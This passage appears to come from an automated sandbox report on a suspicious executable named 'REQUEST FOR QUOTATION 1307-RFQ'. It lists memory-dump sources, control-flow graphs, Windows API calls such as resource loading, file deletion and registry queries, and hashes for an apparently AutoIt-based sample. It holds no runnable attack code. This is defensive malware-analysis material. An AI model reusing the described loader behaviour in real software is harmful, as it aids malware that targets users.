                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1986165174-0
                                                                                                                                                                                                                              • Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                                                                                                                                                                                              • Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 2152 404e89-404ea1 CreateStreamOnHGlobal 2153 404ec1-404ec6 2152->2153 2154 404ea3-404eba FindResourceExW 2152->2154 2155 43d933-43d942 LoadResource 2154->2155 2156 404ec0 2154->2156 2155->2156 2157 43d948-43d956 SizeofResource 2155->2157 2156->2153 2157->2156 2158 43d95c-43d967 LockResource 2157->2158 2158->2156 2159 43d96d-43d98b 2158->2159 2159->2156
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
                                                                                                                                                                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
                                                                                                                                                                                                                              • LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
                                                                                                                                                                                                                              • SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
                                                                                                                                                                                                                              • LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                              • String ID: SCRIPT
                                                                                                                                                                                                                              • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                              • Opcode ID: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                                                                                                                                                                                                              • Instruction ID: 68981a4d98a1b9f26aaf18e99fd77eadcf83d6f3c297b7fdd3b7e429ee84fbe5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59119EB0200300BFD7208B65EC48F2B7BBAFBC9B11F20467DF505D62A0DB71E8058665
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BuffCharUpper
                                                                                                                                                                                                                              • String ID: pbL$%I
                                                                                                                                                                                                                              • API String ID: 3964851224-1578263234
                                                                                                                                                                                                                              • Opcode ID: 9eb65fa8a7af425cda676adb71ece23590fc9d3520494d347d6b2d1cf8502869
                                                                                                                                                                                                                              • Instruction ID: 7d186bf48a599790b4ae94b3728c2257f551fe3f353e5d611b392294ecc69107
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9eb65fa8a7af425cda676adb71ece23590fc9d3520494d347d6b2d1cf8502869
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8927D706043419FD720DF15C480B6BB7E1BF89304F14896EE8999B392D779EC85CB9A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: DdL$DdL$DdL$DdL$Variable must be of type 'Object'.
                                                                                                                                                                                                                              • API String ID: 0-2838938394
                                                                                                                                                                                                                              • Opcode ID: 0f8e83fbc344d2eea3dc03722d5e703962e6ffe245d6c47f3d1b0fc73dbda5c4
                                                                                                                                                                                                                              • Instruction ID: 023dab180a9d3d77a7e8607c3136a2e1727c845c037ec0be429657ea2820e701
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f8e83fbc344d2eea3dc03722d5e703962e6ffe245d6c47f3d1b0fc73dbda5c4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3A29E75A00205CFDB24CF56C480AAAB7B1FF58314F24887BE905AB391D739ED52CB99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0046447B
                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0046448B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 48322524-0
                                                                                                                                                                                                                              • Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                                                                                                                                                                                              • Instruction ID: 0270b6235cd3a211ff5fd07bbdee7491b27fcb3ec88e67c823a813e2b68c3cf0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54E0D8328105006B4610AB78EC0E4EE775C9E85335F100B6AFC35C11D0FB789904969F
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
                                                                                                                                                                                                                              • timeGetTime.WINMM ref: 00410D16
                                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
                                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 00410E61
                                                                                                                                                                                                                              • LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
                                                                                                                                                                                                                              • DestroyWindow.USER32 ref: 00410F06
                                                                                                                                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
                                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
                                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00445C60
                                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00445C6E
                                                                                                                                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                                                                                                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbL$pbL$pbL$pbL
                                                                                                                                                                                                                              • API String ID: 4212290369-1082885916
                                                                                                                                                                                                                              • Opcode ID: 867be865ccffc012ce5c516809f373b0095b39098f657b5a4e6ab7579dc9738c
                                                                                                                                                                                                                              • Instruction ID: d38973a2ad724f636fdb88fa2895c4b9f48f3c0ad1428ec49bcc8c13362f202a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 867be865ccffc012ce5c516809f373b0095b39098f657b5a4e6ab7579dc9738c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BBB29470608741DFEB24DF24C445BABB7E4BF84304F14492FE54997292D779E885CB8A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFreeLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1762890227-0
                                                                                                                                                                                                                              • Opcode ID: 2b4cfbf82587897175794da40316f1881624dc7b6bd09b2f26f04cc3983bbc0a
                                                                                                                                                                                                                              • Instruction ID: 6e1140565c54ce0ca2718fb79faf2203ef12f7076210689dba49f4739c9f3729
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b4cfbf82587897175794da40316f1881624dc7b6bd09b2f26f04cc3983bbc0a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00F14560D4D3819EDB3647288C09736AEE4EF72770F4C07DAE0D5960F2EE649F058226

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1129 469155-469205 call 431940 call 420db6 call 40522e call 468f5f call 404ee5 call 42354c 1142 46920b-469212 call 469734 1129->1142 1143 4692b8-4692bf call 469734 1129->1143 1148 4692c1-4692c3 1142->1148 1149 469218-4692b6 call 4240fb call 422dbc call 422d8d call 4240fb call 422d8d * 2 1142->1149 1143->1148 1150 4692c8 1143->1150 1151 46952a-46952b 1148->1151 1153 4692cb-469387 call 404f0b * 8 call 4698e3 call 42525b 1149->1153 1150->1153 1154 469548-469558 call 405211 1151->1154 1188 469390-4693ab call 468fa5 1153->1188 1189 469389-46938b 1153->1189 1192 4693b1-4693b9 1188->1192 1193 46943d-469449 call 4253a6 1188->1193 1189->1151 1194 4693c1 1192->1194 1195 4693bb-4693bf 1192->1195 1200 46945f-469463 1193->1200 1201 46944b-46945a DeleteFileW 1193->1201 1197 4693c6-4693e4 call 404f0b 1194->1197 1195->1197 1207 4693e6-4693eb 1197->1207 1208 46940e-469424 call 468953 call 424863 1197->1208 1203 469505-469519 CopyFileW 1200->1203 1204 469469-4694f2 call 4240bb call 4699ea call 468b06 1200->1204 1201->1151 1205 46952d-469543 DeleteFileW call 4698a2 1203->1205 1206 46951b-469528 DeleteFileW 1203->1206 1204->1205 1225 4694f4-469503 DeleteFileW 1204->1225 1205->1154 1206->1151 1211 4693ee-469401 call 4690dd 1207->1211 1220 469429-469434 1208->1220 1221 469403-46940c 1211->1221 1220->1192 1223 46943a 1220->1223 1221->1208 1223->1193 1225->1151
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69
                                                                                                                                                                                                                                • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                                                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 00469234
                                                                                                                                                                                                                                • Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B
                                                                                                                                                                                                                              • _wcscpy.LIBCMT ref: 00469247
                                                                                                                                                                                                                              • _wcscat.LIBCMT ref: 0046925A
                                                                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 0046927F
                                                                                                                                                                                                                              • _wcscat.LIBCMT ref: 00469295
                                                                                                                                                                                                                              • _wcscat.LIBCMT ref: 004692A8
                                                                                                                                                                                                                                • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
                                                                                                                                                                                                                                • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED
                                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004691EF
                                                                                                                                                                                                                                • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                                                                                                                                                                                                                • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
                                                                                                                                                                                                                              • _wcsncpy.LIBCMT ref: 004694C5
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?), ref: 004694FB
                                                                                                                                                                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1500180987-0
                                                                                                                                                                                                                              • Opcode ID: 72f74135f6da1f003ebd9f44f595e8cd29ac2ed1f7a032e3997be759fd394df1
                                                                                                                                                                                                                              • Instruction ID: 02a21988af13e7247216c1d96107bbd8e14577c6ac0cce12fd44c5267f831f24
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72f74135f6da1f003ebd9f44f595e8cd29ac2ed1f7a032e3997be759fd394df1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22C13DB1900129AADF11DF95CC81ADEB7BCEF85314F0040ABF609E6251EB749E858F69

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                                                                                                                                                                              • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                                                                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                                                                                                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                                                                                                                                                                              • LoadIconW.USER32(000000A9), ref: 004030F2
                                                                                                                                                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                              • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                              • Opcode ID: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                                                                                                                                                                                                              • Instruction ID: 4440f0663549e4d62e3da2fdffcae7bb40582d53fb7b12173dce245a48cd956c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F317A71801348AFDB50DFA4DC84A9DBFF0FB09310F24456EE480E62A0D7B91599CF69

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                                                                                                                                                                              • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                                                                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                                                                                                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                                                                                                                                                                              • LoadIconW.USER32(000000A9), ref: 004030F2
                                                                                                                                                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                              • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                              • Opcode ID: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                                                                                                                                                                                                              • Instruction ID: 5f72cbcfe52bedf9aac6cae92f5874e6cc1455117f94183018d2e1bba946cea4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD21F9B1911208AFEB40EF94EC48B9DBBF4FB08700F10453AF511A62A0D7B555948FA9

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1295 40708b-4071b0 call 431940 call 407667 call 404706 call 42050b call 407cab call 403f74 call 407667 call 407d8c RegOpenKeyExW 1312 43e8b1-43e8cc RegQueryValueExW 1295->1312 1313 4071b6-4071d3 call 405904 * 2 1295->1313 1314 43e943-43e94f RegCloseKey 1312->1314 1315 43e8ce-43e90d call 420db6 call 40522e RegQueryValueExW 1312->1315 1314->1313 1318 43e955-43e959 1314->1318 1329 43e92b-43e931 1315->1329 1330 43e90f-43e929 call 407bcc 1315->1330 1321 43e95e-43e984 call 4079f2 * 2 1318->1321 1335 43e986-43e994 call 4079f2 1321->1335 1336 43e9a9-43e9b6 call 422bfc 1321->1336 1333 43e933-43e940 call 420e2c * 2 1329->1333 1334 43e941 1329->1334 1330->1329 1333->1334 1334->1314 1335->1336 1348 43e996-43e9a7 call 422d8d 1335->1348 1346 43e9b8-43e9c9 call 422bfc 1336->1346 1347 43e9dc-43ea16 call 407de1 call 403f74 call 405904 call 4079f2 1336->1347 1346->1347 1356 43e9cb-43e9db call 422d8d 1346->1356 1347->1313 1355 43ea1c-43ea1d 1347->1355 1348->1355 1355->1321 1356->1347
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724
                                                                                                                                                                                                                                • Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
